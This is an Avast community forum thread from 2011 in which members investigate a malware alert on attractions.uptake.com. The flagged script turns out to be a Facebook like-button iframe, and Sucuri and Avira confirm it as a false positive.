Author Topic: [SOLVED] attractions.uptake.com ~New Threat?~  (Read 5413 times)

0 Members and 1 Guest are viewing this topic.

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2220
    • The WAR Against Malware
[SOLVED] attractions.uptake.com ~New Threat?~
« on: November 30, 2011, 11:25:45 PM »
I was doing some research for my project when I stumbled upon this site. VirusTotal reported Avira only detected it as showed here:
http://www.virustotal.com/file-scan/report.html?id=6a211a33e80eb62f4ef1b96f0574d06ac94082cf1b5f4defe1ce4bd14f594832-1322690872

Sucuri also says it contains malware:
web site:    attractions(DOT)uptake(DOT)com
status:    Site infected with malware
web trust:     Not Blacklisted
warn:    Wordpress version outdated: Upgrade required.

Known javascript malware.
Details: -http://sucuri.net/malware/entry/MW:IFRAME:HD5

Code: [Select]
document.write(unescape('%3Ciframe src="http://www.facebook.com/plugins/like.php?href=' + thispageURL + ...
Donovansrb10
« Last Edit: December 03, 2011, 03:33:44 PM by Donovansrb10 »
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline doug_uptake

  • Newbie
  • *
  • Posts: 1
Re: attractions.uptake.com ~New Threat?~
« Reply #1 on: December 01, 2011, 12:50:46 AM »
I am a developer at uptake.com.  Can you give me some details on the exact url where you found this?  I assume it is a post somewhere at http://attractions.uptake.com/blog/*.

We would like to

1) Scrub the code, understand how it was injected, take steps to keep it from happening again.
2) Upgrade our version of Wordpress if necessary.

Thanks,
Doug Seifert
Uptake Networks, Inc.

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 36047
Re: attractions.uptake.com ~New Threat?~
« Reply #2 on: December 01, 2011, 01:02:47 AM »
Quote
Can you give me some details on the exact url where you found this?
he already have   ::)
Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2220
    • The WAR Against Malware
Re: attractions.uptake.com ~New Threat?~
« Reply #3 on: December 01, 2011, 04:38:02 AM »
1) Scrub the code, understand how it was injected, take steps to keep it from happening again.
2) Upgrade our version of Wordpress if necessary.

You can upgrade Wordpress to reduce the risk of having the site hijacked again.
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31659
  • malware fighter
Re: attractions.uptake.com ~New Threat?~
« Reply #4 on: December 01, 2011, 04:49:48 PM »
Hi doug_uptake,

Follow Donovansrb10's advice and update your website software to avoid and reduce the chance of re-infection.
Also pay attention to this code that was flagged as suspicious:
-uptake-blogs.s3.amazonaws.com/themes/uptake4/javascripts/site.js suspicious
[suspicious:2] (ipaddr:72.21.211.171) (script) -uptake-blogs.s3.amazonaws.com/themes/uptake4/javascripts/site.js
     status: (referer=-attractions.uptake.com/blog/)saved 80392 bytes ce100fa33adfe4728c9002e13cf26a7d867940d1
     info: [javascript variable] URL=
     info: [javascript variable] URL=-boss.yahooapis.com/ysearch/images/v1/
     info: [javascript variable] URL=-api.search.live.net/json.aspx?appid=
     info: [img] -uptake-blogs.s3.amazonaws.com/themes/uptake4/javascripts/
     info: [decodingLevel=0] found JavaScript
     error: undefined variable jQuery
     error: undefined variable $.event
     error: line:1: SyntaxError: missing ; before statement:
          error: line:1: var $.event = 1;
          error: line:1: ....^
     suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31659
  • malware fighter
Re: attractions.uptake.com ~New Threat?~
« Reply #5 on: December 01, 2011, 07:56:36 PM »
Hi Donovansrb10,

Make that link to -http://sucuri.net/malware/malware-entry-mwiframehd5 non-click-through, please, because the avast Webshields flags HTML:iFrame-EE[Trj] and rightly so. Even at descriptions of malcode or look-ups the avast shields may sound the alarm as the non-munged code example gets recognized, nothwithstanding the fact that it does not infect from there. Similar happened to me on several occasions when visiting jsunpack online service to analyze script or trying to open a particular piece of malcode on a URL through my malzilla browser. We know why this is, my friend, but the unaware forum visitor that click that description link may panick because he does not understand the avast shield reaction,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline spg SCOTT

  • Massive Poster
  • ****
  • Posts: 4130
  • There is no magic, only lost physics
    • spg SCOTT
Re: attractions.uptake.com ~New Threat?~
« Reply #6 on: December 01, 2011, 08:16:59 PM »
Why does Sucuri alert on a facebook like box?

Expecially as the malware entry that it links to is nothing to do with FB.

The MW:IFRAME:HD5  code on the page decodes do something completely unrelated.

“There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!”Richard Feynman

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 36047
Re: attractions.uptake.com ~New Threat?~
« Reply #7 on: December 01, 2011, 09:48:10 PM »
Norman lab
Quote
attractions.uptake.com.htm - Clean!
Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31659
  • malware fighter
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 36047
Re: attractions.uptake.com ~New Threat?~
« Reply #9 on: December 01, 2011, 11:04:36 PM »
was going to post a FP case at Avira but the web seems down at the moment.....
Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31659
  • malware fighter
Re: attractions.uptake.com ~New Threat?~
« Reply #10 on: December 01, 2011, 11:52:19 PM »
Hi Pondus and spg SCOTT,

I do not see any iFrame that goes to -nuotoll.com,
see:  http://www.google.com/safebrowsing/diagnostic?site=nuotoll.com/   as spg SCOTT pointed out in the image from SUCURI's he provided for us. For nuotoll dot com unmasked parasites informs that under certain circumstances third parties could add malicious code to legit sites for which Google Safe Browsing delivers this alert,

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline spg SCOTT

  • Massive Poster
  • ****
  • Posts: 4130
  • There is no magic, only lost physics
    • spg SCOTT
Re: attractions.uptake.com ~New Threat?~
« Reply #11 on: December 02, 2011, 12:20:52 AM »
My point exactly. Sucuri highlights a facebook like button script as a malicious iframe.

It is not similar in anyway.

Is there a way to report something like this to securi?
« Last Edit: December 02, 2011, 01:17:32 AM by spg SCOTT »
“There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!”Richard Feynman

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31659
  • malware fighter
Re: attractions.uptake.com ~New Threat?~
« Reply #12 on: December 02, 2011, 12:41:20 AM »
Hi spg SCOTT,

I assume you could give a reaction on the blog they have going: http://blog.sucuri.net/
It qualifies somewhere under misdetection or false positive. At least it needs explanation.
I see sucuri as one of the better website monitoring scanning services, but they also meet with mistakes, omissions and have to clean out their daily dirt. Never take any detection for granted, always check with other scanners or go directly to the code as you do. That is the lesson we can take here.
Thank you very much, spg SCOTT, for diving into this issue and for the insight gained.
But we also should praise the young Donovansrb10 for starting this thread on this apparent new threat here. He sort of has put his HTML-homework to a good purpose if he stumbled upon a sucuri misdetection,

polonus

 
« Last Edit: December 02, 2011, 12:56:43 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline spg SCOTT

  • Massive Poster
  • ****
  • Posts: 4130
  • There is no magic, only lost physics
    • spg SCOTT
Re: attractions.uptake.com ~New Threat?~
« Reply #13 on: December 02, 2011, 08:04:09 PM »
I found a contact email, and sent them an email. In under 30 minutes, I received this.

Not only is the scanning service very useful, they are very quick once notified :)

Scott

Quote
Hi Scott,

Thanks for sending the link to us. It is indeed a false positive and the scanner was fixed already, so it will not alert on it anymore.

Sorry for the confusion.

Thanks,

“There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!”Richard Feynman

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 36047
Re: attractions.uptake.com ~New Threat?~
« Reply #14 on: December 02, 2011, 09:54:25 PM »
and from Avira lab
Quote
The file 'attractions.uptake.com.htm' has been determined to be 'FALSE POSITIVE'.In particular this means that this file is not malicious but a false alarm.Our analysts named the threat HTML/Rce.Gen.The term "HTML/" denotes a script-virus that is able to infect the system using a HTML script.Detection will be removed from our virus definition file (VDF) with one of the next updates.
Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.